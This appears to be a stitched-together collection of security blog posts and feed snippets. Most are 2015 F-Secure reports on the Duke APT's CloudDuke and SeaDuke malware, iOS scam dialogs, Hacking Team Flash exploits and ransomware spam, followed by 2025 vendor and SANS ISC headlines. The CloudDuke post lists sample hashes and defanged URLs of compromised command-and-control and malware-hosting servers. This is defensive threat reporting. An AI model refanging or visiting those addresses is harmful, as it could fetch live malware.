We tested a scam-site and after a few attempts to dismiss the JavaScript dialog, Safari included a prompt to "Block Alerts". We were then easily able to close the page.

Kudos Apple! Looking forward to seeing this in iOS 9's general release.

Big hat tip to Rosyna Keller.

On 23/07/15 At 09:53 AM

Duke APT group's latest tools: cloud services and Linux support

Posted by Artturi @ 11:59 GMT

Recent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke. Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python. And even more curiously, SeaDuke, with its built-in support for both Windows and Linux, is the first cross-platform malware we have observed from the Duke group. While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or "solutions" as the Duke group apparently calls them. These components include a unique loader, downloader, and not one but two different trojan components. CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data. Finally, some of the recent CloudDuke spear-phishing campaigns have born a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.

Linux support added with the cross-platform SeaDuke malware

Last week, both Symantec and Palo Alto Networks published research on SeaDuke, a newer addition to the arsenal of trojans being used by the Duke group. While older malware by the Duke group has always been written with a combination of the C and C++ programming languages as well as assembly language, SeaDuke is peculiarly written in Python with multiple layers of obfuscation. This Python code is usually then compiled into Windows executables using py2exe or pyinstaller. However, the Python code itself has been designed to work on both Windows and Linux. We therefore suspect, that the Duke group is also using the same SeaDuke Python code to target Linux victims. This is the first time we have seen the Duke group employ malware to target Linux platforms.


An example of the cross-platform support found in SeaDuke.

A new set of solutions with the CloudDuke malware toolset

Last week, we also saw Palo Alto Networks and Kaspersky Labs publish research on malware components they respectively called MiniDionis and CloudLook. MiniDionis and CloudLook are both components of a larger malware toolset we call CloudDuke. This toolset consists of malware components that provide varying functionality while partially relying on a shared code framework and always using the same loader. Based on PDB strings found in the samples, the malware authors refer to the CloudDuke components as "solutions" with names such as "DropperSolution", "BastionSolution" and "OneDriveSolution". A list of PDB strings we have observed is below:

� C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb
� c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb
� c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb
� c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb

The first of the CloudDuke components we have observed is a downloader internally called "DropperSolution". The purpose of the downloader is to download and execute additional malware on the victim's system. In most observed cases, the downloader will attempt to connect to a compromised website to download an encrypted malicious payload which the downloader will decrypt and execute. Depending on the way the downloader has been configured, in some cases it may first attempt to log in to Microsoft's cloud storage service OneDrive and retrieve the payload from there. If no payload is available from OneDrive, the downloader will revert to the previously mentioned method of downloading from compromised websites.

We have also observed two distinct trojan components in the CloudDuke toolset. The first of these, internally called "BastionSolution", is the trojan that Palo Alto Networks described in their research into "MiniDionis". Interestingly, BastionSolution appears to functionally be an exact copy of SeaDuke with the only real difference being the choice of programming language. BastionSolution also makes significant use of a code framework that is apparently internally called "Z". This framework provides classes for functionality such as encryption, compression, randomization and network communications.


A list of classes in the BastionSolution trojan, including multiple classes from the "Z" framework.

Classes from the same "Z" framework, such as the encryption and randomization classes, are also used by the second trojan component of the CloudDuke toolset. This second component, internally called "OneDriveSolution", is especially interesting because it relies on Microsoft's cloud storage service OneDrive as its command and control channel. To achieve this, OneDriveSolution will attempt to log into OneDrive with a preconfigured username and password. If successful, OneDriveSolution will then proceed to copy data from the victim's computer to the OneDrive account. It will also search the OneDrive account for files containing commands for the malware to execute.


A list of classes in the OneDriveSolution trojan, including multiple classes from the "Z" framework.

All of the CloudDuke "solutions" use the same loader, a piece of code whose primary purpose is to decrypt the embedded, encrypted solution, load it in memory and execute it. The Duke group has often employed loaders for their malware but unlike the previous loaders they have used, the CloudDuke loader is much more versatile with support for multiple methods of loading and executing the final payload as well as the ability to write to disk and execute additional malware components.

CloudDuke spear-phishing campaigns and similarities with CozyDuke

CloudDuke has recently been spread via spear-phishing emails with targets reportedly including organizations such as the US Department of Defense. These spear-phising emails have contained links to compromised websites hosting zip archives that contain CloudDuke-laden executables. In most cases, executing these executables will have resulted in two additional files being written to the victim's hard disk. The first of these files has been a decoy, such as an audio file or a PDF file while the second one has been a CloudDuke loader embedding a CloudDuke downloader, the so-called "DropperSolution". In these cases, the victim has been presented with the decoy file while in the background the downloader has proceeded to download and execute one of the CloudDuke trojans, "OneDriveSolution" or "BastionSolution".


Example of one of the decoy documents employed in the CloudDuke spear-phishing campaigns. It has apparently been copied by the attackers from here.

Interestingly, however, some of the other CloudDuke spear-phishing campaigns we have observed this July have born a striking resemblance to CozyDuke spear-phishing campaigns seen almost exactly a year ago, in the beginning of July 2014. In both spear-phishing campaigns, the decoy document has been the exact same PDF file, a "US letter fax test page" (28d29c702fdf3c16f27b33f3e32687dd82185e8b). Similarly, the URLs hosting the malicious files have, in both campaigns, purported to be related to eFaxes. It is also interesting to note, that in the case of the CozyDuke-inspired CloudDuke spear-phishing campaign, the downloading and execution of the malicious archive linked to in the emails has not resulted in the execution of the CloudDuke downloader but in the execution of the "BastionSolution" component thereby skipping one step from the process described for the other CloudDuke spear-phishing campaigns.


The "US letter fax test page" decoy employed in both CloudDuke and CozyDuke spear-phishing campaigns.

Increasingly using cloud services to evade detection

CloudDuke is not the first time we have observed the Duke group use cloud services in general and Microsoft OneDrive specifically as part of their operations. Earlier this spring we released research on CozyDuke where we mentioned observing CozyDuke sometimes either directly use a OneDrive account to exfiltrate stolen data or alternatively CozyDuke downloading Visual Basic scripts that would copy stolen files to a OneDrive account and sometimes even retrieve files containing additional commands from the same OneDrive account.

In these previous cases the Duke group has only used OneDrive as a secondary communication channel but still relied on more traditional C&C channels for most of their actions. It is therefore interesting to note that CloudDuke actually enables the Duke group to rely solely on OneDrive for every step of their operation from downloading the actual trojan, passing commands to the trojan and finally exfiltrating stolen data.

By relying solely on 3rd party web services, such as OneDrive, as their command and control channel, we believe the Duke group is trying to better evade detection. Large amounts of data being transferred from an organization's network to an unknown web server easily raises suspicions. However, data being transferred to a popular cloud storage service is normal. What better way for an attacker to surreptitiously transfer large amounts of stolen data than the same way people are transferring that same data every day for legitimate reasons. (Coincidentally, the implications of 3rd party web services being used as command and control channels is also the subject of an upcoming talk at the VirusBulletin 2015 conference).

Directing limited resources towards evading detection and staying ahead of defenders

Developing even a single multipurpose malware toolset, never mind many, requires time and resources. Therefore it seems logical to attempt to reuse code such as supporting frameworks between different toolsets. The Duke group, however, appear to have taken this a step further with SeaDuke and the CloudDuke component BastionSolution, by rewriting the same code in multiple programming languages. This has the obvious benefits of saving time and resources by providing two malware toolsets, that while similar on the inside, appear completely different on the outside. This way, the discovery of one toolset does not immediately lead to the discovery of the second toolset.

The Duke group, long suspected of ties to the Russian state, have been running their espionage operation for an unusually long time and - especially lately - with unusual brazenness. These latest CloudDuke and SeaDuke campaigns appear to be a clear sign that the Duke's are not planning to stop any time soon.

Research and post by Artturi (@lehtior2)

F-Secure detects CloudDuke as Trojan:W32/CloudDuke.B and Trojan:W64/CloudDuke.B

Samples:

04299c0b549d4a46154e0a754dda2bc9e43dff76
2f53bfcd2016d506674d0a05852318f9e8188ee1
317bde14307d8777d613280546f47dd0ce54f95b
476099ea132bf16fa96a5f618cb44f87446e3b02
4800d67ea326e6d037198abd3d95f4ed59449313
52d44e936388b77a0afdb21b099cf83ed6cbaa6f
6a3c2ad9919ad09ef6cdffc80940286814a0aa2c
78fbdfa6ba2b1e3c8537be48d9efc0c47f417f3c
9f5b46ee0591d3f942ccaa9c950a8bff94aa7a0f
bfe26837da22f21451f0416aa9d241f98ff1c0f8
c16529dbc2987be3ac628b9b413106e5749999ed
cc15924d37e36060faa405e5fa8f6ca15a3cace2
dea6e89e36cf5a4a216e324983cc0b8f6c58eaa8
e33e6346da14931735e73f544949a57377c6b4a0
ed0cf362c0a9de96ce49c841aa55997b4777b326
f54f4e46f5f933a96650ca5123a4c41e115a9f61
f97c5e8d018207b1d546501fe2036adfbf774cfd

Compromised servers used for command and control:

hxxps://cognimuse.cs.ntua.gr/search.php
hxxps://portal.sbn.co.th/rss.php
hxxps://97.75.120.45/news/archive.php
hxxps://portal.sbn.co.th/rss.php
hxxps://58.80.109.59/plugins/search.php

Compromised websites used to host CloudDuke:

hxxp://flockfilmseries.com/eFax/incoming/5442.ZIP
hxxp://www.recordsmanagementservices.com/eFax/incoming/150721/5442.ZIP
hxxp://files.counseling.org/eFax/incoming/150721/5442.ZIP

On 22/07/15 At 11:59 AM

'Zero Days', The Documentary

Posted by Mikko @ 12:40 GMT

VPRO (the Dutch public broadcasting organization) produced a 45-minute documentary about hacking and the trade of zero days. The documentary has now been released in English on YouTube.



The documentary features Charlie Miller, Joshua Corman, Katie Moussouris, Ronald Prins, Dan Tentler, Eric Rabe (of Hacking Team), Felix Lindner, Rodrigo Branco, Ben Nagy, The Grugq, and many others.

On 20/07/15 At 12:40 PM

IOS Crash Report: Blocking "Pop-Ups" Doesn't Really Help

Posted by Sean @ 10:15 GMT

The Telegraph published an article on Thursday about a scam targeting iOS users. Here's the gist: scammers are using JavaScript generated dialogs to display warnings of so-called "IOS Crash" reports prompting people to call for tech support. Near the end of the Telegraph's article, the following advice is offered:

"To prevent the issue happening again, go to Settings -> Safari -> Block Pop-ups."

Unfortunately, this advice is incorrect. And perhaps even more unfortunately, some security and tech pundits are now repeating the bad advice on numerous websites. How do we know the advice is wrong? Because we actually tested it…

First of all, this "IOS Crash Report" scam is a variation of the technical support scam, cases of which have been documented as early as 2008. In the past, cold-calls originated directly from call centers in India. But more recently, web-based lures are used to prompt potential victims into contacting the scammers.

A Google Search returns several live scam sites with this text:

"Due to a third party application in your phone, IOS is crashed."

Here's one of the sites as viewed with iOS Safari on an iPad:



Safari's "Fraudulent Website Warning" and "Block Pop-ups" features didn't prevent the page from loading.

What looks like a pop-up on the image above is actually a JavaScript generated dialog. One which will continuously re-spawn itself and can be very difficult to dismiss. Turning off JavaScript in Safari is the quickest way to regain control. Unfortunately, leaving JavaScript disabled will significantly impact a large number of legitimate websites.

Here's the same site as viewed with Google Chrome for Windows:



Notice the additional text in the image above: prevent this page from creating additional dialogs. Current versions of Chrome and Firefox (for Windows, at least) will inject this option into re-spawning dialogs, allowing the user to break the loop. Sadly, Internet Explorer and Safari do not. (We tested with IE for Windows / Windows Phone, and iOS Safari.)

Wouldn't be great if all browsers supported this prevention feature?

Yeah, we think so, too.

But it's not just browsers, apps with browser functionality can also be affected.

Here's an example of a JavaScript dialog displayed via Cydia.



The end of the Telegraph's article included the following advice from City of London police:

"Never give your iCloud username and password or your bank details to someone over the phone."

Indeed! Giving somebody your iCloud password could quickly turn a support scam into a data hijacking and extortion scheme. We attempted to call several of the scammer telephone numbers to see if they would ask for our iCloud credentials — only to discover that the numbers we tried are currently not in service.

Hopefully they stay that way. (They won't.)

On 17/07/15 At 10:15 AM

Hacking Team 0-day Flash Wave with Exploit Kits

Posted by Patricia @ 12:29 GMT

After Hacking Team was compromised, a lot of information were publicly disclosed beginning 5th of July, particularly its business clients and a zero-day vulnerability for the Adobe Flash Player that they have been using.

Since the info about the first zero-day was made freely available, we knew attackers would swiftly move into using it. As expected, the flash exploit was integrated into exploit kits such as Angler, Magnitude, Nuclear, Neutrino, Rig, and HanJuan as reported by Kafeine.

Based on our telemetry, there was a rise in Flash exploits beginning 6th and continued until 9th.




Here are the stats for each exploit kit:




The security advisory for CVE-2015-5119 zero-day was released on 7th July and the patch was made available on 8th. So the hits started to decline about two days after the patch.

But just when people have started updating their systems, there was yet another spike from the Angler flash exploit hits:




Apparently, two more flash vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were discovered. These vulnerabilities are still waiting to be patched. According to Kafeine, one of the two vulnerabilities were added into the Angler exploit kit.

As a side note related to Angler exploit kit, if you noticed in the second chart above, Angler and HanJuan share the same statistics. This was due to the fact that our detections for Angler Flash exploits were also hitting on HanJuan Flash exploits.

We have verified this after discovering that there was a different URL pattern being detected by Angler:




We looked at the flash exploit used by both kits, and the two are very much identical.

Angler Flash Exploit:




HanJuan Flash Exploit:




There were already speculations that there seem to be strong connections between the actors behind the two exploits kits. For example, both have used �fileless� delivery of payload and even similar encryption methods. Perhaps at some point we will see HanJuan supporting this new flash 0 day as well.

In the meantime, since there hasn�t been a patch out yet for these new ones, our users remain protected from the effects of the exploit kits through Browsing Protection as well as these detections:

Exploit:SWF/AnglerEK.L
Exploit:SWF/NeutrinoEK.C
Exploit:SWF/NeutrinoEK.D
Exploit:SWF/NuclearEK.H
Exploit:SWF/NuclearEK.J
Exploit:SWF/Salama.H
Exploit:SWF/Salama.R
Exploit:JS/AnglerEK.D
Exploit:JS/NuclearEK.I
Exploit:JS/MagnitudeEK.A

UPDATE: Adobe has released patches for the recent two vulnerabilities: CVE-2015-5122 and CVE-2015-5123. Users are recommended to update to the latest version of Adobe Flash Player.

On 13/07/15 At 12:29 PM

The Trusted Internet: Who governs who gets to buy spyware from surveillance software companies?

Posted by FSLabs @ 02:31 GMT

When hackers get hacked, that's when secrets are uncovered. On July 5th, Italian-based surveillance technology company Hacking Team was hacked. The hackers released a 400GB torrent file with internal documents, source code, and emails to the public - including the company's client list of close to 60 customers.

The list included countries such as Sudan, Kazakhstan and Saudi Arabia - despite official company denials of doing business with oppressive regimes. The leaked documents strongly implied that in the South-East Asian region, government agencies from Singapore, Thailand and Malaysia had purchased their most advanced spyware, referred to as a Remote Control System (RCS).

According to security researchers Citizen Lab, this spyware is extraordinarily intrusive, with the ability to turn on microphone and cameras on mobile devices, intercept Skype and instant messages, and use an anonymizer network of proxy servers to prevent harvested information from being traced back to the command and control servers.

Based on images of the client list posted to pastebin the software was purchased in Malaysia by the Malaysia Anti-Corruption Commission (MACC), Malaysia Intelligence (MI) and the Prime Minister's Office (PMO):



Additional images of leaked invoices posted to medium.com indicated the spyware was sold through a locally-based Malaysian company named Miliserv Technologies (M) Sdb Bhd (registered with the Ministry of Finance Malaysia), which specializes in providing digital forensics, intelligent gathering and public security services:





Why the Prime Minister's Office would need surveillance software remains puzzling. Mind you, professional grade spyware ain't cheap - a license upgrade could cost you MYR400, 000 and maintenance renewal will set you back about MYR160,000.

According to reports of the incident in Malaysian alternative media, Malaysian government agencies have probably been using the spyware even before discovery of the FinFisher malware that was detected in the run-up to the 2013 General Elections.

Coincidentally, Malaysia has also been the frequent host of the annual ISS World Asia tradeshow, where companies promote their arsenal of 'lawful' surveillance software to law enforcement agencies, telco service provider or government employees. During the 2014 event, the Hacking Team was present and the associate lead sponsor of the event.

MiliServ Technologies is currently involved in the upcoming 2015 ISS World Asia in Kuala Lumpur. The event is invitation-only � though it may be interesting to see if Hacking Team will make it there this year.


Post by – Su Gim

On 08/07/15 At 02:31 AM

Problematic Wassenaar Definitions

Posted by Sean @ 13:25 GMT

The Wassenaar Arrangement, a multilateral export control regime, defines "intrusion software" as software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network capable device. Intrusion software is used to: extract data or information, or to modify system or user data; or to modify the standard execution path of a program or process in order to allow the execution of externally provided instructions.

Wassenaar states that monitoring tools are software or hardware devices that monitor system behaviours or processes running on a device. This includes antivirus (AV) products, end point security products, Personal Security Products (PSP), Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) or firewalls.


(Source)


So… what we at F-Secure (and the rest of the antivirus industry) call "malware" appears to easily fit Wassenaar's definition of intrusion software.

Why is this interesting?

Well, the US Bureau of Industry and Security (BIS), part of the US Department of Commerce, has proposed updating its rules to require a license for the export of intrusion software.

And according to the Dept of Commerce, "an export" is –any– item that is sent from the United States to a foreign destination. "Items" include among other things, software and technology.

The Paradox

So… if malware is intrusion software, and any item is an export, how exactly are US-based customers supposed to submit a malware sample to their European antivirus vendor? Seriously, customers send us zero-day using malware all the time. Not to mention the samples that we routinely exchange with other trusted AV vendors from around the globe.

Unintended Consequences

The text associated with the BIS proposal says the scope includes penetration testing products that use intrusion software in what looks like an attempt to limit "hacking" tools, but there is nothing about what is excluded from the scope. So the BIS might not intend to limit customers from uploading malware samples to their AV vendor, but that could be the effect if this new rule is adopted and arbitrarily enforced. Or else it could just force people to operate in a legal limbo. Is that what we want?

The BIS is taking comments until July 20th.

On 09/06/15 At 01:25 PM

Found Item: UK Wi-Fi Law?

Posted by Sean @ 13:27 GMT

I visited the UK last Thursday, found a coffee shop offering "free" Wi-Fi, and read this…

"UK Law states that we must know who is using our Wi-Fi at all times."

Now I'm not a lawyer — but that seems like quite the disingenuous claim.



Mobile number, post code, and date of birth??

I wonder how many people fall for this type of malarkey.

Post by — @Sean

On 08/06/15 At 01:27 PM

SMS Exploit Messages

Posted by Sean @ 13:56 GMT

There's an iOS vulnerability affecting iPhone, iPad, and even Apple Watch that allows for a denial of service.

Crashing a phone with an SMS? That's so 2008.


S60 SMS Exploit Messages

Unlike 2008, this time kids are reportedly using the vulnerability to harass others.

Apple is working on a security update. But unfortunately… that update very likely won't be available for older iPhones.

Updated to add:

Here's the "Effective Power" exploit crashing an iPhone 6:


Effective Power Unicode iOS hack on iPhone 6

And this… is Effective Power crashing the iOS Twitter app:


Effective Power Unicode iOS hack vs Twitter

On 28/05/15 At 01:56 PM

Ransomware Spam E-Mails Targeting Users in Italy and Spain

Posted by FSLabs @ 03:17 GMT

In the past few days, we received some cases from our customers in Italy and Spain, regarding malicious spam e-mails that pointed to Cryptowall or Cryptolocker ransomware.

The spam e-mails pretended to come from a courier/postal service, regarding a parcel that was waiting to be collected. The e-mails offer a link to track that parcel online:



When we did the initial investigation of the e-mails from our standard test system, the link redirected to Google:



So, no malicious behavior? Well, we noted that the first two URLs were PHP. Since PHP code is executed on the server side, not locally on the client, it is possible that the servers were 'deciding' whether to redirect the user to Google or to serve malicious content, based on some preset conditions.

Since this particular spam e-mail is written in Italian - perhaps only a customer based in Italy would be able to see the malicious payload? Fortunately, we have Freedome, so we can travel to Italy for a little while to experiment.

So we turned on Freedome, set the location to Milan and clicked the link in the e-mail again:



Now we see the bad stuff. If the user is (or appears to be) located in Italy, the server will redirect them to a malicious file hosted on a cloud storage server.

The e-mail spam sent to Spanish users is similar, though in those cases, a CAPTCHA challenge is included to make the site seem more authentic. If the link in the e-mail is clicked by a user located outside Spain, again we end up in Google:



If the site is visited instead from an Spanish IP, we get to the CAPTCHA screen:



And then to the malware itself:



This spam campaign doesn't use any exploits (so far), just old-fashioned social engineering; infection only occurs if the user manually downloads and executes the files offered on the malicious URLs. For our customers, the URLs are blocked and the files are detected.

(malware SHA1s: 483be8273333c83d904bfa30165ef396fde99bf2, 295042c167b278733b10b8f7ba1cb939bff3cb38)

Post by — Victor

On 19/05/15 At 03:17 AM

Mac Hack Demonstration

Posted by Sean @ 12:46 GMT

Securing your SSH password is very important. Otherwise, you might be pwned by a little girl with her Raspberry Pi.



Don't worry, it's an authorized hack, she asked her mom for permission.

On 15/05/15 At 12:46 PM

Email Security Considerations for Microsoft 365 Users

The post Email Security Considerations for Microsoft 365 Users appeared first on GreatHorn.

Email Security Considerations for Google Workspace Users

The post Email Security Considerations for Google Workspace Users appeared first on GreatHorn.

Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates

The post Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates appeared first on GreatHorn.

Universities and Colleges Face Multi-faceted Email Security Challenges

The post Universities and Colleges Face Multi-faceted Email Security Challenges appeared first on GreatHorn.

Spam vs Phish: The Problem with User-Reported Phish Buttons

The post Spam vs Phish: The Problem with User-Reported Phish Buttons appeared first on GreatHorn.

Phishing for Google Impersonation Attacks

Bad actors around the globe go phishing in emails twenty-four hours a day, seven days a week. Whether they are “guppies” like your local bakery down the street or big “fish” like Google, no one is immune to their attacks. Google, one of the largest, most well-known – and used – applications, will always be […]

The post Phishing for Google Impersonation Attacks appeared first on GreatHorn.

GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes

GMX (Global Mail eXchange) Mail is an email service where users may register up to 10 individual email addresses at no cost. As a result, threat actors are leveraging this service to easily spin up new email addresses and effectively delivering phishing attacks that bypass Microsoft o365 and Google Workspace, landing in an organization’s email […]

The post GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes appeared first on GreatHorn.

Native vs SEG vs ICES: What You Need to Know About Email Security

The shift from on-premise email platforms to cloud email platforms has taken shape, with the majority (70%) of organizations. Microsoft 365 and Google Workspace remain the predominant email platforms for organizations. However, a significant change has occurred in the past year. With an estimated 40% of ransomware attacks that start through email, and BEC and […]

The post Native vs SEG vs ICES: What You Need to Know About Email Security appeared first on GreatHorn.

Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security

In cybersecurity, buzzwords come and go, often being replaced with new buzzwords while the market is still attempting to realize the benefits of the former. Today, every technology vendor is talking about Artificial Intelligence (AI). In reality, Machine Learning (the method to one day achieve AI) is still the predominant technical solution deployed within vendor […]

The post Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security appeared first on GreatHorn.

Global Supply Chain: Attackers Targeting Business Deliveries

Our global supply chain includes all the people, companies and countries that need to work cohesively to manufacture, process and ship goods. Disruptions in the global supply chain are increasingly impacting organizations, with logistical problems crossing most industries.  As a result, the continued strain on the supply chain puts added pressure on businesses as they […]

The post Global Supply Chain: Attackers Targeting Business Deliveries appeared first on GreatHorn.

Best Automated Patch Management Software in 2025

Did you know? — Recent research shows that 80% of cyberattacks happen due to unpatched software vulnerabilities. This highlights the critical role of automated patch management software in safeguarding systems. These tools not only streamline updates but also fortify your systems against evolving cyber threats. In this article, we’ll talk about the best automated patch […]

The post Best Automated Patch Management Software in 2025 appeared first on Heimdal Security Blog.

Heimdal and Interbel Partner to Secure Spanish Businesses Against Rising Cyber Threats

BARCELONA, Spain, and COPENHAGEN, Denmark, January 20, 2025 — Heimdal, a leading cybersecurity company, has partnered with Interbel, a Spanish cybersecurity and Email value added distributor with over 27 years of experience. Together, they will deliver powerful and user-friendly cybersecurity solutions to businesses across Spain, addressing the rising challenges of sophisticated cyber threats and complex […]

The post Heimdal and Interbel Partner to Secure Spanish Businesses Against Rising Cyber Threats appeared first on Heimdal Security Blog.

How to Prepare for NIS2 Audits – A Compliance Expert’s View

Third-party security questionnaires and the number of audits that are growing every year are killing everybody’s soul! – Larisa Mihai, Cyber Compliance Expert In October 2024, European Union member states had a deadline to transpose the NIS2 Directive into national law. Although not all countries have begun enforcing the rules, it will eventually become the […]

The post How to Prepare for NIS2 Audits – A Compliance Expert’s View appeared first on Heimdal Security Blog.

Best 8 Endpoint Protection Software

Endpoint protection software works like a security system for a digital hotel. They equip each ‘room’ – in our case work device – with a lock, alarms, video surveillance, etc. This way they make sure each visitor or hotel employee uses the private or common spaces safely and legit. Endpoint protection tools act like digital […]

The post Best 8 Endpoint Protection Software appeared first on Heimdal Security Blog.

How to Negotiate Your NIS2 Fine or Completely Avoid the Risk

In the next few years, a growing number of organizations across Europe will face investigations for non-compliance with the NIS2 Directive. If they are found to have poor cybersecurity practices, they may well be forced to pay multi-million Euro fines and other penalties. The best way to manage the risk of NIS2 penalties is, of […]

The post How to Negotiate Your NIS2 Fine or Completely Avoid the Risk appeared first on Heimdal Security Blog.

NIS2 Compliance Checklist

The NIS2 Compliance Directive is a pivotal regulation aimed at enhancing cybersecurity within critical sectors across the European Union. With its stringent requirements for managing cyber risks, securing supply chains, and reporting incidents, it’s essential for organizations to ensure compliance. This article outlines the crucial steps for aligning with NIS2 standards, drawn from our comprehensive […]

The post NIS2 Compliance Checklist appeared first on Heimdal Security Blog.

Heimdal and Watsoft Team Up to Strengthen MSP Cybersecurity in France

COPENHAGEN, Denmark, and PARIS, France, January 13, 2025 — Heimdal, a top European cybersecurity company, is teaming up with Watsoft, a French IT distributor focused on Managed Service Providers (MSPs). This partnership will help MSPs in France deal with today’s growing cybersecurity challenges by simplifying how they manage security and offering reliable tools from a […]

The post Heimdal and Watsoft Team Up to Strengthen MSP Cybersecurity in France appeared first on Heimdal Security Blog.

Best 10 Unified Endpoint Management Software

Managing laptops, smartphones, and IoT devices is no easy task – especially with remote work on the rise. The best Unified Endpoint Management (UEM) software turns chaos into control. By bringing endpoint management into a single platform, UEM simplifies IT operations, boosts security, and keeps devices up to date effortlessly. Whether you’re dealing with device sprawl […]

The post Best 10 Unified Endpoint Management Software appeared first on Heimdal Security Blog.

Top 10 Managed Service Providers in New York for 2025

Managed Service Providers (MSPs) play a pivotal role in supporting businesses by managing their IT needs.   This article will shine a spotlight on the top Managed Service Providers  in New York, those that offer exceptional services and stand out from their peers.   Our selection is based on a mix of client reviews, range […]

The post Top 10 Managed Service Providers in New York for 2025 appeared first on Heimdal Security Blog.

NIS2 Compliance – How to Do It Sustainably by Continuous Compliance

Two weeks. That’s how long your organization will have to prepare if you face a NIS2 compliance audit. In those two weeks (just 10 working days), you’ll need to collate a huge amount of evidence to show you’re meeting minimum security standards. We’re talking about risk assessment records, an overview of all your security measures, […]

The post NIS2 Compliance – How to Do It Sustainably by Continuous Compliance appeared first on Heimdal Security Blog.

Top 10 Managed Service Providers in Florida for 2025

In Florida, a state known for its dynamic business landscape as much as its unpredictable weather, selecting from the top Managed Service Providers (MSPs) is essential for companies looking to thrive.  These MSPs not only provide crucial IT support but also tailor their services to adapt to the fast-paced and ever-evolving market demands of the […]

The post Top 10 Managed Service Providers in Florida for 2025 appeared first on Heimdal Security Blog.

How Do Hackers Exploit Your Vulnerabilities?

At the time of writing, there are hundreds of thousands of publicly known vulnerabilities. These range from critical flaws that could cause irreparable damage if exploited to low-severity issues that might seem barely even worth bothering with. With vulnerability management, the challenge is knowing which is which.  With so many vulnerabilities across operating systems, networks, software, […]

The post How Do Hackers Exploit Your Vulnerabilities? appeared first on Heimdal Security Blog.

How to Defend Against the Three Most Dangerous Cybersecurity Attacks

There are a lot of different hacking techniques to be aware of. At the time of publication, the MITRE ATT&CK framework identified some 236 hacking techniques across 14 different categories. Luckily, you don’t need to understand all these tactics to stay safe. Many are close variations of the same basic approach. The best cybersecurity tools […]

The post How to Defend Against the Three Most Dangerous Cybersecurity Attacks appeared first on Heimdal Security Blog.

Top 10 Managed Service Providers in New Jersey for 2025

New Jersey, often seen as the corridor between New York and Philadelphia, is not only a strategic location for businesses but also a hub for technology services, including top Managed Service Providers.  Managed Service Providers play a crucial role in empowering businesses by managing their IT needs.  In this article we will highlight the top […]

The post Top 10 Managed Service Providers in New Jersey for 2025 appeared first on Heimdal Security Blog.

The 12 Best Incident Response Software On the Market in 2025

Nowadays, cyber threats are more sophisticated and common than ever.  Companies face significant risks from breaches, ransomware, and other malicious activities, leading to financial loss, reputational damage, and operational disruptions. Strong incident response capabilities are now essential. Investing in top-tier incident response software is crucial. These tools offer comprehensive solutions for efficiently detecting, managing, and […]

The post The 12 Best Incident Response Software On the Market in 2025 appeared first on Heimdal Security Blog.

An unusual "shy z-wasp" phishing, (Mon, Jan 27th)

Threat actors who send out phishing messages have long ago learned that zero-width characters and unrendered HTML entities can be quite useful to them. Inserting a zero-width character into a hyperlink can be used to bypass some URL security checks without any negative impact on the function of the link, while any unrendered entities can be used to break up any suspicious words or sentences that might lead to the message being classified as a potential phishing, without the recipient being aware of their inclusion.

ISC Stormcast For Monday, January 27th, 2025 https://isc.sans.edu/podcastdetail/9296, (Mon, Jan 27th)

No summary available.

[Guest Diary] How Access Brokers Maintain Persistence, (Fri, Jan 24th)

[This is a Guest Diary by Joseph Flint, an ISC intern as part of the SANS.edu BACS [1] program]

ISC Stormcast For Friday, January 24th, 2025 https://isc.sans.edu/podcastdetail/9294, (Fri, Jan 24th)

No summary available.

XSS Attempts via E-Mail, (Thu, Jan 23rd)

One of the hardest applications to create securely is webmail. E-mail is a complex standard, and almost all e-mail sent today uses HTML. Displaying complex HTML received in an e-mail within a web application is dangerous and often leads to XSS vulnerabilities. Typical solutions include the use of iframe sandboxes and HTML sanitizers. But still, XSS vulnerabilities sneak into applications even if they try hard to get it right. One of my "favorite" examples of how subtle mistakes can cause vulnerabilities was a recent Protonmail vulnerability [1]. Even if you are not using webmail to read email, you may still be exploited as some native email clients have allowed HTML content to leak credentials or have been subject to other HTML-related problems, often related to including content from third-party websites dynamically.

ISC Stormcast For Thursday, January 23rd, 2025 https://isc.sans.edu/podcastdetail/9292, (Wed, Jan 22nd)

No summary available.

Catching CARP: Fishing for Firewall States in PFSync Traffic, (Wed, Jan 22nd)

Legend has it that in the Middle Ages, monchs raised carp to be as "round" as possible. The reason was that during Lent, one could only eat as much as fit on a plate, and the round shape of a carp gave them the most "fish per plate". But we are not here to exchange recipes. I want to talk about CARP and the network failover feature.

ISC Stormcast For Wednesday, January 22nd, 2025 https://isc.sans.edu/podcastdetail/9290, (Wed, Jan 22nd)

No summary available.

Geolocation and Starlink, (Tue, Jan 21st)

Until now, satellite internet access has been more of a niche solution for internet access. But with the wide availability of Starlink, this is changing. Starlink&#;x26;#;39;s performance and price are competitive for many rural users to forgo solutions like cellular or slower DSL speeds if they are available at all.

ISC Stormcast For Tuesday, January 21st, 2025 https://isc.sans.edu/podcastdetail/9288, (Tue, Jan 21st)

No summary available.

Phishing is the Top Security Threat For Smartphone Users

Phishing attacks are the most common security issue for smartphone users, according to a new study by Omdia.

84% of Healthcare Organizations Sustained Cyberattacks Last Year

A new survey by cybersecurity vendor Netwrix found that 84% of healthcare organizations spotted a cyberattack in the past twelve months, with phishing attacks accounting for 63% of these incidents.

4 Ways to Mature Your Human Risk Management Program

Human risk management (HRM) is now the primary approach to addressing the ongoing need for strong security cultures in organizations of all sizes. HRM focuses on more than just security awareness training (SAT) delivered at regular intervals. The goal is a positive security culture through:

Russian Spear-Phishing Campaign Targets WhatsApp Accounts

